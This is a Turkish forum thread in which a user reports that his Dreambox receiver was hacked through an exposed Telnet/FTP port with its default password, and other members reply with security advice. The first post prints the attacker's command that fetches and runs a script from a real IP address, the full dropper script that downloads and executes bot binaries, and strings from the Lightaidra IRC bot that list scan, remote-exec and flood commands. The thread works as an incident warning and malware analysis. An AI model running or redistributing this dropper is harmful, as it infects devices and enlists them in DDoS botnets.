turk-dreamworld.com Sitesine Hoşgeldiniz.


1. sayfa - 2 sayfa var 12 SonuncuSonuncu
11 sonuçtan 1 ile 10 arası
  1. #1
    Server Admin Sanchooo187 - ait Kullanıcı Resmi (Avatar)
    Üyelik tarihi
    Feb 2007
    Mesajlar
    4.986
    Total 'Thanks' Received by This User :
    13 Bu Konu icin
    120 Toplam

    Standart Dreambox Hack

    Slm Arkadaslar,

    dün benim Dreambox 7020HD hacklandigini fark ettim. Onun icin sizi uyarmak istiyorum.

    Hack nasil olustu:
    Gecenlerde Routerda Telnet/FTP Portunu actim ve Dreamboxa yönlendirdim. Dreambox yeni oldugu icin sifre degismemistim. Isleri hal ettikten sonra Portlari kapatmayi unutmusum. Yaklasik bir hafta acik kaldi.

    Hacki nasil fark ettim:
    Son günlerde benim Router takilmaya basladi ve Dreambox düzgün yürümedi. Onun icin bakayim dedim, telnet üzeri baglandim ve biraz arastirdim. Su komut benim ilgimi cekti:

    Kod:
    rm -rf /var/run/getbinaries.sh; wget -c http://108.166.187.75/getbinaries.sh -P /var/run && sh /var/run/getbinaries.sh&
    Bu komut ne yapiyor:
    /var/run/ klasörde getbinaries.sh dosyasini siliyor, sonra wget komutu ile 108.166.187.75 IP üzeri yeni indirip /var/run klasöre kayit ediyor. En sonunda calistiriyor.

    Tabiki ben wget komutu ile incelemek icin bu dosyayi indirdim. Dosyanin icergi söyle:

    Kod:
    #!/bin/sh
    # THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
    # UPLOAD GETBINARIES.SH IN YOUR HTTPD.
    
    # YOUR HTTPD SERVER:
    REFERENCE_HTTP="http://108.166.187.75"
    
    
    # NAME OF BINARIES:
    REFERENCE_MIPSEL="mipsel"
    REFERENCE_MIPS="mips"
    REFERENCE_SUPERH="sh"
    REFERENCE_ARM="arm"
    REFERENCE_PPC="ppc"
    
    rm -fr /var/run/${REFERENCE_MIPSEL} \
     /var/run/${REFERENCE_MIPS} \
     /var/run/${REFERENCE_SUPERH} \
     /var/run/${REFERENCE_ARM} \
     /var/run/${REFERENCE_PPC}
    
    wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run && chmod +x /var/run/${REFERENCE_MIPSEL} && /var/run/${REFERENCE_MIPSEL}
    wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && chmod +x /var/run/${REFERENCE_MIPS} && /var/run/${REFERENCE_MIPS}
    wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && chmod +x /var/run/${REFERENCE_ARM} && /var/run/${REFERENCE_ARM}
    wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && chmod +x /var/run/${REFERENCE_PPC} && /var/run/${REFERENCE_PPC}
    wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && chmod +x /var/run/${REFERENCE_SUPERH} && /var/run/${REFERENCE_SUPERH}
    
    sleep 3;
    rm -fr /var/run/getbinaries.sh
    Bu script ne yapiyor:
    Kisacasi 108.166.187.75 IPden 5 tane dosya indiriyor (mipsel,mips,sh,arm ve ppc) sonra /var/run/ klasörde calistirmaya calisiyor. Isimler zaten üstünde. File komutu ile dosyalara bakinca:

    Kod:
    arm:            ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped
    mips:           ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
    mipsel:         ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
    ppc:            ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
    sh:             ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, not stripped
    Tabiki Dreambox 7020HD mipsel (little endian) oldugu icin, mipsel dosyasini calismis.

    strings komutu ile bu dosyayi arastirinca benim Dreambox 7020HD'yi bot yapmislar diye fark ettim:

    strings komutu kücük parcasi:

    Kod:
    PRIVMSG %s :* *** Access Commands:
    PRIVMSG %s :*
    PRIVMSG %s :* .login                <password>        - login to bot's party-line
    PRIVMSG %s :* .logout                                 - logout from bot's party-line
    PRIVMSG %s :* *** Miscs Commands
    PRIVMSG %s :* .exec                 <commands>        - execute a system command
    PRIVMSG %s :* .version                                - show the current version of bot
    PRIVMSG %s :* .status                                 - show the status of bot
    PRIVMSG %s :* .help                                   - show this help message
    PRIVMSG %s :* *** Scan Commands
    PRIVMSG %s :* .advscan <a> <b>      <user> <passwd>   - scan with user:pass (A.B) classes sets by you
    PRIVMSG %s :* .advscan <a> <b>                        - scan with d-link config reset bug
    PRIVMSG %s :* .advscan->recursive   <user> <pass>     - scan local ip range with user:pass, (C.D) classes random
    PRIVMSG %s :* .advscan->recursive                     - scan local ip range with d-link config reset bug
    PRIVMSG %s :* .advscan->random      <user> <pass>     - scan random ip range with user:pass, (A.B) classes random
    PRIVMSG %s :* .advscan->random                        - scan random ip range with d-link config reset bug
    PRIVMSG %s :* .advscan->random->b   <user> <pass>     - scan local ip range with user:pass, A.(B) class random
    PRIVMSG %s :* .advscan->random->b                     - scan local ip range with d-link config reset bug
    PRIVMSG %s :* .stop                                   - stop current operation (scan/dos)
    PRIVMSG %s :* *** DDos Commands:
    PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
    PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
    PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
    PRIVMSG %s :* .spoof          <ip>                    - set the source address ip spoof
    PRIVMSG %s :* .synflood       <host> <port> <secs>    - tcp syn flooder
    PRIVMSG %s :* .ngsynflood     <host> <port> <secs>    - tcp ngsyn flooder (new generation)
    PRIVMSG %s :* .ackflood       <host> <port> <secs>    - tcp ack flooder
    PRIVMSG %s :* .ngackflood     <host> <port> <secs>    - tcp ngack flooder (new generation)
    PRIVMSG %s :* *** IRC Commands:
    PRIVMSG %s :* .setchan        <channel>               - set new master channel
    PRIVMSG %s :* .join           <channel> <password>    - join bot in selected room
    PRIVMSG %s :* .part           <channel>               - part bot from selected room
    PRIVMSG %s :* .quit                                   - kill the current process
    PRIVMSG %s :* *** EOF
    JOIN %s :%s
    PING 0313370
    PRIVMSG %s :[logout] you are logged out!, (%s).
    %*s%*s%*s%*s%255[^
    PRIVMSG %s :[!exec] error on command: %s
    (NULL)
    PRIVMSG %s :[exec] result of "%s":
    PRIVMSG %s :%s
    PRIVMSG %s :[version] lightaidra 0x2012.
    PRIVMSG %s :[status] currently not working.
    PRIVMSG %s :[status] working on %s
    PRIVMSG %s :[spoof] spoofing set as random ip!
    PRIVMSG %s :[error] one error in your input data, see help!
    PRIVMSG %s :[spoof] spoofing set as ip: %s
    advscan scanning range %s.%s.0.0/16 (user:%s pass:%s)
    advscan scanning range %s.%s.0.0/16
    PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16 (user:%s pass:%s), wait..
    PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16, wait..
    PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16. wait..
    PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16 (user:%s pass:%s). wait..
    PRIVMSG %s :[stop] %s was stopped!
    operation
    QUOTE ZOMBIE
    PRIVMSG %s :[chan] %s setted as master channel.
    PART %s :%s
    Aidra?!
    QUIT :pwn!
    synflood packeting %s:%u (secs: %u)
    PRIVMSG %s :[synflood] start packeting: %s:%u (secs: %u).
    ngsynflood packeting %s:%u (secs: %u)
    PRIVMSG %s :[ngsynflood] start packeting: %s:%u (secs: %u).
    ackflood packeting %s:%u (secs: %u)
    PRIVMSG %s :[ackflood] start packeting: %s:%u (secs: %u).
    ngackflood packeting %s:%u (secs: %u)
    PRIVMSG %s :[ngackflood] start packeting: %s:%u (secs: %u).
    /var/run/.lightscan
    PRIVMSG %s :[error] unable to open: %s
    Strings komutu arastirmak isteyen arkadaslar icin strings.txt dosyasini yükledim.

    Hacki silmek icin ne yapmak lazim:

    Tabiiki Telnet/FTP portlari kapatmak. Sonra ps komutu ile /var/run/mipsel id'sini ögrenmek ve kill ID ile programi kapatmak. Sonunda rm ile /var/run/mipsel silin. Tabiiki programin kodunu tam bilmedigim icin silmek yeterlimi bilmiyorum. Sizin networke ulasdigi icin tabiiki baska sistemlerede girme imkani var. Ancak program öbür sistemlere bulasiyormu onuda bilemiyorum.

    Binary'leri incelemek icin bana PM attin size verebilirim.

    Saygilar
    Eklenmiş Dosya Eklenmiş Dosya
      Mesaja cevap vermeden eklentiyi indiremessiniz
    AlıntıAlıntı

  2. Teşekkür edenler:

    Destan (14.11.2012) , SEVMEK46 (21.08.2012) , avsar (3.05.2012) , sayder (3.05.2012) , OsmaNLı (3.05.2012) , Elvis (3.05.2012) , as11 (3.05.2012) , -Ulus- (3.05.2012) , ADANALI. (3.05.2012) , JOKER (3.05.2012) , besir (3.05.2012) , kocahaydar (3.05.2012) , d-king (3.05.2012)

  3. #2
    Senior Member cveneburi - ait Kullanıcı Resmi (Avatar)
    Üyelik tarihi
    Dec 2007
    Mesajlar
    876
    Total 'Thanks' Received by This User :
    0 Bu Konu icin
    206 Toplam

    Standart Cevap: Dreambox Hack

    uyarılarınız için teşekkürler bir bakmak lazım belki bizdede vardır
    1.70 mega motorlu sistem
    vu+duo
    AlıntıAlıntı

  4. #3
    Administrator besir - ait Kullanıcı Resmi (Avatar)
    Üyelik tarihi
    Jan 2007
    Mesajlar
    6.653
    Total 'Thanks' Received by This User :
    0 Bu Konu icin
    1.578 Toplam

    Standart Cevap: Dreambox Hack

    uyiri icin tesekkürler sanchooo187 usta. demek dreamboxu bot yapip kendi amaclari icin kullanmislar.
    gerekmedikce disari hic bir port acmayin. acarsanizda en azindan sifrelerinizi degistirin.
    Herseye Ragmen HAYAT Devam Ediyor.



    Lütfen paylasimi sade Forumda yapalim.Özel Mesaj, Email, MSN üzeri olursa Topluma faydasi olmaz.

    TürkDreamWorld'de paylasilan dosyalar sade deneme Amaciyla sunulmusdur.
    Biz TürkDreamWorld Ailesi kesinlikle Mesuliyet kabul etmiyoruz.

    PayTV Abosuz bakmak Yasaktir!

    AlıntıAlıntı

  5. #4
    Vip Member -Ulus- - ait Kullanıcı Resmi (Avatar)
    Üyelik tarihi
    Dec 2008
    Mesajlar
    974
    Total 'Thanks' Received by This User :
    0 Bu Konu icin
    594 Toplam

    Standart Cevap: Dreambox Hack

    Sanchooo187 usta, anlamdigim telnet icin routerde portu niye acman gerekti,
    cünki ben simdiye kadar routerde hic bir port acmisligim yok ve yinede telnet/ftp baglantisi kurabiliyorum.

    uyari icin tesekkürler ben hayatta bir port acmam artik ama acmam gerkirse, artik sifreyi degitirmem olacak
    AlıntıAlıntı

  6. #5
    TDW Team-S-Mod. kocahaydar - ait Kullanıcı Resmi (Avatar)
    Üyelik tarihi
    Jul 2008
    Bulunduğu yer
    Germany
    Mesajlar
    29.337
    Total 'Thanks' Received by This User :
    1 Bu Konu icin
    111.692 Toplam

    Standart Cevap: Dreambox Hack

    Ulus abi, disarda Dreamboxa baglanmak istersek, TCP Protokölü olarak Port acmamiz gerekiyor.

    Sundugum tüm dosyalar test amaclidir.
    Yanlis kullanmada veya herhangi bir problem oldugunda herkes kendisi sorumludur.
    Kesinlikle Mesuliyet kabul etmiyorum.
    AlıntıAlıntı

  7. Teşekkür edenler:

    -Ulus- (3.05.2012)

  8. #6
    Server Admin Sanchooo187 - ait Kullanıcı Resmi (Avatar)
    Üyelik tarihi
    Feb 2007
    Mesajlar
    4.986
    Total 'Thanks' Received by This User :
    0 Bu Konu icin
    120 Toplam

    Standart AW: Cevap: Dreambox Hack

    Alıntı kocahaydar Nickli Üyeden Alıntı [Değerli Ziyaretci, linki görmeniz icin bu mesaja cevap yazmanız gerekiyorÜye olmak icin burayı tıklayınız]
    Ulus abi, disarda Dreamboxa baglanmak istersek, TCP Protokölü olarak Port acmamiz gerekiyor.
    Evet kocahaydar usta hakli, ama acmamin nedeni yüksel ustanin benim alete girip birseylere bakmak zorundaydi. Yoksa benim network garantili, vpn kullaniyorum. Yani disardan baglanmak istesem bile port acmama gerek yok.
    AlıntıAlıntı

  9. #7
    Administrator Elvis - ait Kullanıcı Resmi (Avatar)
    Üyelik tarihi
    Feb 2007
    Bulunduğu yer
    Istanbul, Turkey
    Mesajlar
    8.327
    Total 'Thanks' Received by This User :
    0 Bu Konu icin
    5.913 Toplam

    Standart Cevap: Dreambox Hack

    Bilgilendirdigin icin tesekkurler sancho usta Port acsanizda acmasanizda illaki güvenirli bir sifre ile korunmakta fayda var sahsen bende elime yeni cihaz aldimi ilk is olarak sifre degisirim.
    Kim Hakkımda ne Düşünüyorsa Allah ona 10 Mislini Versin


    AlıntıAlıntı

  10. #8
    TDW Team-Co Admin OsmaNLı - ait Kullanıcı Resmi (Avatar)
    Üyelik tarihi
    Mar 2008
    Mesajlar
    4.374
    Total 'Thanks' Received by This User :
    0 Bu Konu icin
    1.828 Toplam

    Standart Cevap: Dreambox Hack

    bende ftp telnet web gibi işler için uzaktan cihaza bağlanıyorum ama her ne olursa olsun şifremi değiştiriyorum
    şimdiye kadar problem yaşamadım.sizede geçmiş olsun ayrıca paylaşım için tşklr dikkatli olmak gerekiyor
    AlıntıAlıntı

  11. #9
    Member cosmos811 - ait Kullanıcı Resmi (Avatar)
    Üyelik tarihi
    Mar 2011
    Mesajlar
    95
    Total 'Thanks' Received by This User :
    0 Bu Konu icin
    15 Toplam

    Standart Cevap: Dreambox Hack

    bir zamanlar çook konu açmıştım.hemen hemen bir çok forumda bu açığı anlatmıştım öncelikle dreamboxun şifresini değiştirmekle.sonra modemin şifresini değiştirin.mümkünse şifre kısmını rakam harf ve karakter olarak değiştirn çünkü siz modemden port açmasanızda sizin ıp nizden modem arayüzüne girip zaten modemlerin kullanıcı adı ve şifresi sabit biliniyor herkesçe modemden kendileride port açabilirler yani.en büyük açık modem cihaz değil.
    AlıntıAlıntı

  12. #10
    Senior Member Nisbet3000 - ait Kullanıcı Resmi (Avatar)
    Üyelik tarihi
    Feb 2008
    Mesajlar
    783
    Total 'Thanks' Received by This User :
    0 Bu Konu icin
    55 Toplam

    Standart Cevap: Dreambox Hack

    bir duzeltme yapalim misal benim yasadigim yerde yurt disi demek yeterli sanirim internet sirketleri bazilari 1000 e kadar olan portlari otomatik kapali yeni istesenizde acamazsiniz..arti bunu yapmayanlar 22,23,80 gibi portlari acilmamak uzere yani modeme ulasilmamasi icin komple kapatmislardir bu yuzden acik daha guvenliyiz...


    Bir çivi bir nalı, bir nal bir tırnagı, bir tırnak bir ayagı, bir ayak bir atı, bir at bir kumandanı, bir kumandan bir vatanı mahvedebilir....
    AlıntıAlıntı

 

 
1. sayfa - 2 sayfa var 12 SonuncuSonuncu

Benzer Konular

  1. DreamBox Tools 3.0 SÜPER PROGRAMLAR DREAMBOX KAÇIRMAYIN LİNK ÖLMEDEN
    Von grindcore im Forum Dreambox Flash Programları
    Cevaplar: 66
    Son Mesaj: 15.04.2015, 08:20

Yetkileriniz

  • Konu Acma Yetkiniz Yok
  • Cevap Yazma Yetkiniz Yok
  • Eklenti Yükleme Yetkiniz Yok
  • Mesajınızı Değiştirme Yetkiniz Yok
  •  

Page generated in 1.711.648.835.60487 seconds with 24 queries Sayfa Boyutu (274489)